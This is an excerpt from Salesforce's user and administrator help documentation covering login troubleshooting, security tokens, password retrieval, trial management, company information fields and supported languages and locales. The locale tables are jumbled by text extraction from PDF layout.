Click Help & Training at the top of any page and select the Training tab to sign up for and take training classes. All classes
are free and are conducted online by salesforce.com staff. Online training is not included with Personal Edition or Developer
Edition.

TROUBLESHOOTING AND SUPPORT

Troubleshooting Login Issues
Available in: All Editions except Database.com

Salesforce makes it easy to log on to the service and to change your password, but you may experience issues if you forget your
username or password, or if you’re locked out for too many attempts to log on with the wrong credentials. The password
policies set up by your administrator determine how many failed logins are allowed, how long lockout periods last, and password
requirements such as minimum length.

We recommend changing your password periodically to protect the privacy of your data. If your administrator specifies that
user passwords expire on a periodic basis, you’ll be prompted to change your password at the end of each period.

• Forgot your password? Retrieve it.

• Locked out? Wait until the lockout period expires and try again, or contact your administrator.

• Password expired? We’ll prompt you to change your password. You may also need to reactivate your computer.
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Tip:  You might want to bookmark theSalesforce login page using the login link you received in your welcome email.
If you do create a bookmark, be sure not to accidentally bookmark the Password Reset page instead.

See Also:
Resetting Your Security Token
Retrieving Forgotten Passwords

Resetting Your Security Token
Available in: All Editions

Connect for Outlook, Connect Offline, Connect for Office, Connect for Lotus Notes are not available in Database.com

A security token is an automatically generated key that you must add to the end of your password in order to log in to Salesforce
from an untrusted network. For example, if your password is mypassword, and your security token is XXXXXXXXXX, then
you must enter mypasswordXXXXXXXXXX to log in. Security tokens are required whether you log in via the API or a desktop
client such as Connect for Outlook, Connect Offline, Connect for Office, Connect for Lotus Notes, or the Data Loader.

You are offered a security token if you try to access Salesforce from an untrusted network. Once you have been issued a security
token, you have the option to reset this security token at any time.

To reset your security token:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Reset My Security Token.
• If you clicked My Settings, select Personal > Reset My Security Token.

3. Click the Reset Security Token button. The new security token is sent via email to the email address on your Salesforce
user record.

If you have never been offered a security token, for example, because your organization restricts the IP addresses from which
you can log in, the Reset My Security Token node does not appear in your personal settings.

Tip:  We recommend that you obtain your security token using the Salesforce user interface from a trusted network
prior to attempting to access Salesforce from a new IP address.
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Granting Login Access
Available in: All Editions

Granting administrator access available in: Enterprise, Unlimited, Developer, and Database.com Editions

Watch a Demo: Letting Your Salesforce Administrator Access Your Account (1:41 minutes)

To assist you, your administrator or a customer support representative may need to log in to the application using your login.
You can grant access to them for a specified duration. For security reasons, the maximum period for granting access is limited
to one year. During the time you have granted access, they can use your login and access your data to help you resolve any
problems.

To grant login access:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Grant Login Access.
• If you clicked My Settings, select Personal > Grant Account Login Access.

3. Set the access expiration date by choosing a value from the picklist.
4. Click Save.

If an administrator, support representative, or publisher makes setup changes using your login, the setup audit trail lists those
changes, including the username of the delegate user who made the changes.

Note: You may be unable to grant access to certain support organizations due to restrictions set up by your administrator
or based on the type of licensing used by a packaged application.

See Also:
Understanding Your Administrator's Role

Retrieving Forgotten Passwords
Available in: All Editions

1. Go to https://login.salesforce.com.
2. Click Forgot your password?.
3. Enter your username and click Continue. You’ll receive an email at the email address specified on your Salesforce Personal

Information page.
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4. Click the link provided in the email, answer your password question, and click Continue. A temporary password is
automatically sent to your email address.

5. Click the link to log in using the temporary password.
6. When prompted, enter a new password.

You might have to activate your computer to successfully log in to Salesforce whenever your password is changed or reset, or
when you log in from a computer you have not previously used to access Salesforce.

See Also:
Activating Your Computer
Troubleshooting Login Issues

How can I log Salesforce support cases?
To log support cases, visit the Self-Service Portal. If you require additional assistance, open a case through Customer Support
in the Help & Training window.
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Welcome, Salesforce Administrators
Available in: All Editions

As a Salesforce administrator—that is, a user assigned to the Administrator profile—you’re responsible for setting up your
online organization, which means adding users and configuring the system for your needs.

This guide contains the details you need to set up and maintain a Salesforce organization.

We hope this guide provides the complete content you need to get your organization up and running with Salesforce. If you
need further support, contact the Support team at salesforce.com.

SALESFORCE TRIALS

Trial Overview
Available in: All Editions except Database.com

During your trial, you can evaluate Salesforce before you subscribe. Your trial includes:

• Sample data. You can delete sample data or start a new trial.

• Administrator privileges. The person who signed up automatically becomes the administrator. You can add another
administrator when you add more users.

• A variety of Salesforce features.

• The ability to subscribe to Salesforce.

Note:  Features included in your trial may not be available in the Edition you choose to purchase.

If you set up multiple users in your trial and later choose to convert to Personal Edition, all users except the original
system administrator will be deactivated.

SET UP AND MAINTAIN YOUR
SALESFORCE ORGANIZATION

178



Starting a New Trial
Available in: Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Modify All Data”To start a new trial:

When you sign up for Salesforce, you can choose an industry-specific template with sample data. During your trial period,
you can start a new trial with a blank template. To start a new trial, you must abandon your current trial, including all data
and customizations.

You can start a new trial if you have:

• Less than 1000 rows of data

• No additional user licenses added by salesforce.com

• No additional functionality enabled by salesforce.com

To start a new trial:

1. From Setup, click Data Management > Start a New Trial. This link is available only during your trial period.
2. Select your language and template preferences.
3. Enter the requested text stating that you want to abandon your current trial organization and all of its data. This includes

both sample data and data you have entered.
4. Check the box to confirm that all of your current trial data will be lost.
5. Click Submit.
6. When the confirmation page appears, click Submit.

Note:  By choosing to start a new trial, you are abandoning your current trial organization including all existing data
and customizations. You will no longer be able to access the trial or data. Only usernames will be preserved.

Converting a Trial Using Checkout
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

Users with a Checkout account can convert a Salesforce trial into an Edition subscription. If your organization doesn’t have
self-service access to Checkout, submit a request to your salesforce.com representative.

To convert your trial Edition into a subscription using Checkout, you must create a quote.

Note: At any point during the quote creation process, you can click Request Assistance to contact your salesforce.com
account representative.

To convert your trial Edition into a subscription:
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1. To create a quote, click Subscribe Now or select Checkout from the Force.com Apps drop-down list. Note that the Edition
and products used in your trial organization are preselected in Checkout.

Important:  If at any point during quote creation you close the window, you lose all changes. If you are creating
a new quote, you lose the entire quote. You can click Save for Later on any page if you want to save your changes
and continue editing it later.

2. If you are a new user, or creating or editing a quote from a trial, enter and confirm the information on the Subscription
Information tab.

3. If you are creating or editing a quote from a trial of a larger Edition, enter and confirm the information on the Products
page, review your billing information, and click Jump to Order Review.

4. If you want to create a quote for another Edition, click Editions and Pricing. Enter and confirm the subscription, product,
and billing information, then click Jump to Order Review. The Order Review page displays the information you entered,
as well as complete pricing for all products on the quote.

Note:  If you convert a trial organization to a lesser Edition, such as moving from a Professional Edition trial to
a Group Edition subscription, some features and data from your trial are deleted. To accept the deletions, select
the Acknowledgment checkbox. Click Review this to see a list of features not supported in your chosen Edition.
If you want to back up all of your data before converting, log into your Salesforce organization and from Setup,
click Data Management > Data Export.

5. Verify your purchase and click Place Order.

As a trial user, if you create a quote and don't follow through with placing an order, the quote is saved in Checkout. Once you
complete a quote and place an order for an Edition subscription, any other Edition quotes you have open are closed.

See Also:
Checkout User Guide

Deleting Trial Data
Available in: All Editions except Database.com

User Permissions Needed

“Modify All Data”To delete trial data:

When you sign up for Salesforce, your organization is initially populated with some sample data. During your trial period,
administrators can delete all of this sample data plus all of your organization’s data at one time.

To delete all of the existing data in a trial organization:

1. From Setup, click Data Management > Delete All Data. This link is available only during your trial period.
2. Enter the requested text stating that you understand that all of the data in your organization will be deleted. This includes

both sample data and data you have entered. Your user and administration setup is not affected.
3. Click Submit.
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After your trial period has ended, you can delete any sample data manually or with the Mass Delete feature.

SET UP YOUR ORGANIZATION

Company Information Overview
See the information provided when your company signed up with Salesforce under Setup at Company Profile > Company
Information.

Available in: All editions

User Permissions Needed

“View Setup and Configuration”To view company information:

“Customize Application”To change company information:

From the Company Information page, you can:

• Edit your company's information.

• View the user licenses, feature licenses, and usage-based entitlements your organization has access to.

• Add or subtract user or feature licenses.

In addition to license types, the following portal login information is listed for organizations that have Customer Portals or
partner portals enabled:

• Monthly Logins Allotted shows the maximum number of customer or partner portal logins allowed per month.

• Monthly Logins Used indicates the number of successful logins for all users associated with a customer or partner
portal user license for the month.

See Also:
Company Information Fields
Enabling Multiple Currencies

Company Information Fields

The available fields vary according to which Salesforce Edition you have.

The Company Information page has the following fields (listed in alphabetical order), including the user and feature licenses
purchased for your organization.
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DescriptionField

Street address of the organization. Up to 255 characters are
allowed in this field.

Address

Allow administrators in your organization to choose whether
they want to receive administrator-targeted promotional emails
from salesforce.com.

Admin Newsletter

The total number of API requests issued by the organization
in the last 24 hours. The maximum number of requests
depends on your Edition.

API Requests, Last 24 Hours

City in which organization is located. Up to 40 characters are
allowed in this field.

City

The currency in which the organization's corporate
headquarters reports revenue. Serves as the basis for all

Corporate Currency

currency conversion rates. Only for organizations that use
multiple currencies.

Country in which organization is located. Up to 80 characters
are allowed in this field.

Country

The country for the address. Entry is selected from a picklist
of standard values.

Country (beta)

User who signed up the organization, including creation date
and time. (Read only)

Created By

The country or geographic region in which the organization
is located. The setting affects the format of currency amounts.
For single currency organizations only.

Currency Locale

The default language that is selected for new users in the
organization. This setting determines the language used for

Default Language

the user interface text and help. In all editions except Personal
Edition and Database.com, individual users can separately set
the language for their own login, which will override the
organization setting. In Group Edition, this field is called
Display Language.

This setting also determines the language in which all
customizations—such as custom fields, tabs, and user interface
options—are stored. For customizations, individual users'
language settings do not override this setting.

The default country or geographic region that is selected for
new users in the organization. This setting determines the

Default Locale

format of dates, times, and names in Salesforce. In Contact
Manager, Group, Professional, Enterprise, Unlimited, and
Developer Edition organizations, individual users can set their
personal locale, which overrides the organization setting. In
Group Edition, this field is called Locale.
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DescriptionField

Primary time zone in which the organization is located. A
user's individual Time Zone setting overrides the
organization's Default Time Zone setting.

Note: Organizations in Arizona should select “Mountain
Standard Time,” and organizations in parts of Indiana that

Default Time Zone

do not follow Daylight Savings Time should select “Eastern
Standard Time.”

Group or division that uses the service, for example, PC Sales
Group. Up to 40 characters are allowed in this field.

Division

Fax number. Up to 40 characters are allowed in this field.Fax

If using a standard fiscal year, the starting month and year for
the organization’s fiscal year. If using a custom fiscal year, the
value will be “Custom Fiscal Year.”

Fiscal Year Starts In

Select this checkbox to prevent advance notices about planned
system downtime from displaying to users when they log in
to Salesforce.

Hide Notices About System Downtime

Select this checkbox to prevent advance notices about planned
system maintenance from displaying to users when they log
in to Salesforce.

Hide Notices About System Maintenance

User who last changed the company information, including
modification date and time. (Read only)

Modified By

Allow users in your organization to choose whether they want
to receive user-targeted promotional emails from
salesforce.com.

Newsletter

Name of the organization. Up to 80 characters are allowed in
this field.

Organization Name

Main phone number at organization. Up to 40 characters are
allowed in this field.

Phone

Person who is main contact or administrator at the
organization. You can enter a name, or select a name from a

Primary Contact

list of previously defined users. Up to 80 characters are allowed
in this field.

Number of Salesforce user accounts that can be defined for
access to the service. This is the number of Salesforce user
licenses for which the organization is billed, if charges apply.

Salesforce Licenses

Code that uniquely identifies your organization to
salesforce.com.

Salesforce.com Organization ID
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DescriptionField

Number of restricted login users who have logged in during
the current month.

This value resets to zero at the beginning of each month. The
maximum number of restricted login users for the organization
is in parentheses.

Restricted Logins, Current Month

State or province in which organization is located. Up to 80
characters are allowed in this field.

State

The state or province for the address. Entry is selected from
a picklist of standard values.

State/Province (beta)

The total number of Streaming API events used by the
organization in the last 24 hours. The maximum number of
events depends on your edition.

Streaming API Events, Last 24 Hours

Zip or postal code of the organization. Up to 20 characters
are allowed in this field.

Zip

Amount of data storage in use; the value is expressed as a
measurement (for example, 500 MB) and as a percentage of
the total amount of data storage available (for example, 10%).

Used Data Space

Amount of file storage in use; the value is expressed as a
measurement (for example, 500 MB) and as a percentage of
the total amount of file storage available (for example, 10%).

Used File Space

See Also:
Company Information Overview

Required Domains
Available in: All Editions.

Salesforce uses these domains to deliver content.

• *.staticforce.com
• *.content.force.com
• *.force.com
• *.salesforce.com

If you whitelist domains, add these to your list of allowed domains. If you’ve disabled third-party cookies (typically enabled
by default in all major browsers), you must accept them for Salesforce to function properly. If your users have general access
to the Internet, no action is required.
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Improved Setup User Interface Overview
The improved Setup user interface provides a streamlined interface for viewing and managing personal and administrative
setup tasks.

Available in: All editions except Database.com

When the improved Setup user interface is enabled in an organization, you might notice several differences from the original
user interface.

• The Setup menu is accessed from the Setup link on the upper-right corner of any Salesforce page.

• The Setup menu is organized into goal-based categories: Administer, Build, Deploy, Monitor, and Checkout.

• Personal settings, which all Salesforce users can edit, are available from a separate My Settings menu.

To access My Settings, click your name in the upper-right corner of any Salesforce page, then click My Settings. You can
also access My Settings from your Chatter profile page: in the right pane, click My Settings.

• The My Settings home page includes quick links for easily accessing the most commonly used personal settings tools and
tasks.

Important:  When enabled, the improved Setup user interface is activated for every user in an organization. Be sure
to notify your organization before enabling or disabling this setting.

To enable the improved Setup user interface, from Setup, click Customize > User Interface, then select Enable Improved
Setup User Interface.

Note:  The improved Setup user interface:

• Is not supported in Internet Explorer version 6

• Is available only when the new user interface theme is enabled

See Also:
Finding Your Personal Settings
Finding the Setup Menu

Understanding Language, Locale, and Currency
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

The Salesforce settings for language, locale, time zone, and currency can affect how objects (Accounts, Leads, Opportunities,
etc.) are displayed. In a single currency organization, the Salesforce administrators set the currency locale, default language,
default locale, and default time zone for their organizations and the users can set their individual language, locale, and time
zone on their personal settings pages. In a multiple currency organization, the Salesforce administrators set the corporate
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currency, default language, default locale, and default time zone for their organizations and the users can set their individual
currency, language, locale, and time zone on their personal settings pages.

Note:  Single language organizations cannot change their language, although they can change their locale.

Who can edit the settingSetting

User in a multiple currency organizationCurrency

Administrator in a multiple currency organizationCorporate Currency

Administrator in a single currency organizationCurrency Locale

Not editableDefault Currency ISO Code

AdministratorDefault Language

AdministratorDefault Locale

AdministratorDefault Time Zone

Not editableInformation Currency

UserLanguage

UserLocale

UserTime Zone

See Also:
Language Settings Overview
Supported Currencies
What languages does Salesforce support?
Supported Locales
Supported Time Zones
Setting Corporate Currency

Language Settings Overview

Available in: All Editions except Database.com

The Salesforce Web user interface, Salesforce for Outlook, Connect for Outlook, Connect Offline, and Connect for Office
are available in multiple languages.

The Salesforce Web user interface has two language settings:

• Personal language—All on-screen text, images, buttons, and online help display in this language. Edit your personal
information to change this setting.
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• Default organization language—This applies to all new users until they select their personal language. This setting also
determines the language in which all customizations—such as custom fields, tabs, and user interface options—are stored.
For customizations, users' personal language settings don't override this default setting. Some setup items that are manually
entered by an administrator can be translated in the Translation Workbench.

Administrators can change this setting by editing the company information.

Text entered by users remains in the language in which it was entered.

See Also:
Understanding Language, Locale, and Currency

What languages does Salesforce support?
Salesforce.com offers three levels of language support: fully supported languages, end user languages, and platform-only
languages. All languages are identified by a two-character language code (such as en) or a five-character locale code (such as
en_AU).

Note:  Setting a default locale is different from setting a default language.

Aside from the three levels of language support for Salesforce features, documentation, and application development tools,
there are two ways you can actually localize your organizations. First, the Translation Workbench: The Translation Workbench
lets you specify languages you want to translate, assign translators to languages, create translations for customizations you’ve
made to your Salesforce organization, and override labels and translations from managed packages. Everything from custom
picklist values to custom fields can be translated so your global users can use all of Salesforce in their language..

If your custom application uses a small number of Salesforce’s standard tabs and fields, you can translate them by renaming
tab and field labels.

Fully Supported Languages

You can change the language for all features, including Help, to one of the following fully supported languages from Setup
by clicking Company Profile > Company Information > Edit.

• Chinese (Simplified): zh_CN
• Chinese (Traditional): zh_TW
• Danish: da
• Dutch: nl_NL
• English: en_US
• Finnish: fi
• French: fr
• German: de
• Italian: it
• Japanese: ja
• Korean: ko
• Portuguese (Brazil): pt_BR
• Russian: ru
• Spanish: es
• Swedish: sv
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• Thai: th*

* Even though the Salesforce interface is fully translated to Thai, Help remains in English.

End User Languages

For end user languages, Salesforce provides translated labels for all standard objects and pages except Setup and Help. End
user languages are useful if you have a multilingual organization or partners who speak languages other than your company’s
default language.

When you specify an end user language, labels and Help that are not translated fall back to English except for Spanish (Mexico),
which falls back to Spanish.

• Arabic: ar
• Bulgarian: bg
• Czech: cs
• English (UK): en_GB
• Greek: el
• Spanish (Mexico): es_MX
• Hebrew: iw
• Hungarian: hu
• Indonesian: in
• Norwegian: no
• Polish: pl
• Romanian: ro
• Turkish: tr
• Ukrainian: uk
• Vietnamese: vi

Platform-Only Languages

Platform-only languages are used when you want to localize custom functionality (apps) that you’ve built on the Salesforce
platform. When you choose a platform-only language, Salesforce provides translations for all of the custom objects and field
labels in the chosen language.

Platform-only languages are available in all of the places you can select a language in the application, but selecting a platform-only
language will default all labels in the application to English. All customizations made to Salesforce can be translated into a
platform-only language, and renaming can be used to provide translations for standard field names on most objects. However,
informative text and non-field label text is not translatable.

When you specify a platform-only language, labels for standard objects and fields fall back to English except: English (Australia),
English (India), English (Malaysia), and English (Philippines) fall back to English (UK); French (Canada) falls back to French;
Moldovan falls back to Romanian; and Portuguese (European) falls back to Portuguese (Brazil).

• Albanian: sq
• Armenian: hy
• Basque: eu
• Bosnian: bs
• Croatian: hr
• English (Australia): en_AU
• English (Canada): en_CA
• English (India): en_IN
• English (Malaysia): en_MY

188

Understanding Language, Locale, and CurrencySet Up Your Organization



• English (Philippines): en_PH
• Estonian: et
• French (Canada): fr_CA
• Georgian: ka
• Hindi: hi
• Icelandic: is
• Irish: ga
• Latvian: lv
• Lithuanian: lt
• Luxembourgish: lb
• Macedonian: mk
• Malay: ms
• Maltese: mt
• Moldovan: ro_MD
• Montenegrin: sh_ME
• Portuguese (European): pt_PT
• Romansh: rm
• Serbian (Cyrillic): sr
• Serbian (Latin): sh
• Slovak: sk
• Slovenian: sl
• Tagalog: tl
• Urdu: ur
• Welsh: cy

See Also:
Understanding Language, Locale, and Currency

Supported Locales

Available in: Group, Professional, Enterprise, Unlimited, Database.com, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view company information:

“Customize Application”To change company information:

The available personal setup options vary according to which Salesforce Edition you have.

The Salesforce locale settings determine the following display formats:

• Date and time

• Users’ names
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• Addresses

• Commas and periods in numbers

Locale names with a country in parentheses also set a default currency.

Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

arArabic

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

UAE Dirham:
AED

ar_AEArabic
(United Arab
Emirates)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

Bahraini
Dinar: BHD

ar_BHArabic
(Bahrain)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

Egyptian
Pound EGP

ar_EGArabic
(Egypt)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

Jordanian
Dinar: JOD

ar_JOArabic
(Jordan)
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

Kuwaiti
Dinar: KWD

ar_KWArabic
(Kuwait)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

Lebanese
Pound: LBP

ar_LBArabic
(Lebanon)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00  02/01/2008
04:30 PM

Saudi Arabian
Riyal: SAR

ar_SAArabic (Saudi
Arabia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002008-1-2
16:30

bgBulgarian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002008-1-2
16:30

Bulgaria Lev:
BGN

bg_BGBulgarian
(Bulgaria)
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002/01/2008
16:30

caCatalan

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002/01/2008
16:30

Euro: EURca_ESCatalan
(Spain)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.1.2008
16:30

csCzech

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.1.2008
16:30

Czech
Koruna: CZK

cs_CZCzech (Czech
Republic)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002-01-2008
16:30

daDanish
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002-01-2008
16:30

Danish
Krone: DKK

da_DKDanish
(Denmark)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

deGerman

ZipCode City

State Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

Euro: EURde_ATGerman
(Austria)

ZipCode City

State Country

Address Line
1,

Address Line
2

Ms. FName
LName

1'234.5606:0002.01.2008
16:30

Swiss Franc:
CHF

de_CHGerman
(Switzerland)

ZipCode City

State Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

Euro: EURde_DEGerman
(Germany)

ZipCode City

State Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

Euro: EURde_LUGerman
(Luxembourg)

ZipCode City

State Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:00  μ2/1/2008 4:30
PM

elGreek

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:00  μ2/1/2008 4:30
PM

Greek
Drachma:
EUR

el_GRGreek
(Greece)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM2/01/2008
4:30 PM

Australian
Dollar: AUD

en_AUEnglish
(Australia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Barbados
Dollar: BBD

en_BBEnglish
(Barbados)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Bermuda
Dollar: BMD

en_BMEnglish
(Bermuda)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM02/01/2008
4:30 PM

Canadian
Dollar: CAD

en_CAEnglish
(Canada)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:0002/01/2008
16:30

British
Pound: GBP

en_GBEnglish
(United
Kingdom)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Ghanian Cedi
(New): GHS

en_GHEnglish
(Ghana)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Indonesian
Rupiah: IDR

en_IDEnglish
(Indonesia)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:0002/01/2008
16:30

Euro: EURen_IEEnglish
(Ireland)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM2/1/2008 4:30
PM

Indian rupee:
INR

en_INEnglish
(India)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Malaysian
Dollar
(Ringgit):
MYR

en_MYEnglish
(Malaysia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Nigerian
Naira: NGN

en_NGEnglish
(Nigeria)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM2/01/2008
4:30 PM

New Zealand
Dollar: NZD

en_NZEnglish (New
Zealand)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Philippines
Peso: PHP

en_PHEnglish
(Philippines)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Singapore
Dollar: SGD

en_SGEnglish
(Singapore)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

U.S. Dollar:
USD

en_USEnglish
(United
States)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM2008/01/02
4:30 PM

South African
Rand: ZAR

en_ZAEnglish
(South Africa)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002/01/2008
16:30

esSpanish

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002/01/2008
16:30

Argentine
Peso: ARS

es_ARSpanish
(Argentina)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02-01-2008
04:30 PM

Bolivian
Boliviano:
BOB

es_BOSpanish
(Bolivia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02-01-2008
04:30 PM

Chilean Peso:
CLP

es_CLSpanish
(Chile)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM2/01/2008
04:30 PM

Colombian
Peso: COP

es_COSpanish
(Colombia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM02/01/2008
04:30 PM

Costa Rica
Colon: CRC

es_CRSpanish
(Costa Rica)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM01/02/2008
04:30 PM

Dominican
Republic
Peso: DOP

es_DOSpanish
(Dominican
Republic)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02/01/2008
04:30 PM

CFA Franc
(BEAC):
XAF

es_ECSpanish
(Ecuador)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002/01/2008
16:30

Euro: EURes_ESSpanish
(Spain)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM2/01/2008
04:30 PM

Guatemala
Quetzal:
GTQ

es_GTSpanish
(Guatemala)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM01-02-2008
04:30 PM

Honduras
Lempira:
HNL

es_HNSpanish
(Honduras)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM2/01/2008
04:30 PM

Mexican
Unidad de
Inversion
(UDI): MXV

es_MXSpanish
(Mexico)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM01/02/2008
04:30 PM

Panama
Balboa: PAB

US Dollar:
USD

es_PASpanish
(Panama)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02/01/2008
04:30 PM

Peruvian
Nuevo Sol:
PEN

es_PESpanish
(Peru)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM01-02-2008
04:30 PM

U.S. Dollar:
USD

es_PRSpanish
(Puerto Rico)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02/01/2008
04:30 PM

Paraguayan
Guarani:
PYG

es_PYSpanish
(Paraguay)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:00 AM01-02-2008
04:30 PM

U.S. Dollar:
USD

es_SVUSSpanish (El
Salvador)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02/01/2008
04:30 PM

Uruguayan
New Peso:
UYU

es_UYSpanish
(Uruguay)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:00 AM02/01/2008
04:30 PM

Venezuelan
Bolivar
Fuerte: VEF

es_VESpanish
(Venezuela)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.01.2008
16:30

Estonian
Kroon: EEK

et_EEEstonian
(Estonia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.1.2008
16:30

fiFinnish

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.1.2008
16:30

Euro: EURfi_FIFinnish
(Finland)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:0002/01/2008
16:30

frFrench

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002/01/2008
16:30

Euro: EURfr_BEFrench
(Belgium)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:002008-01-02
16:30

Canadian
Dollar: CAD

fr_CAFrench
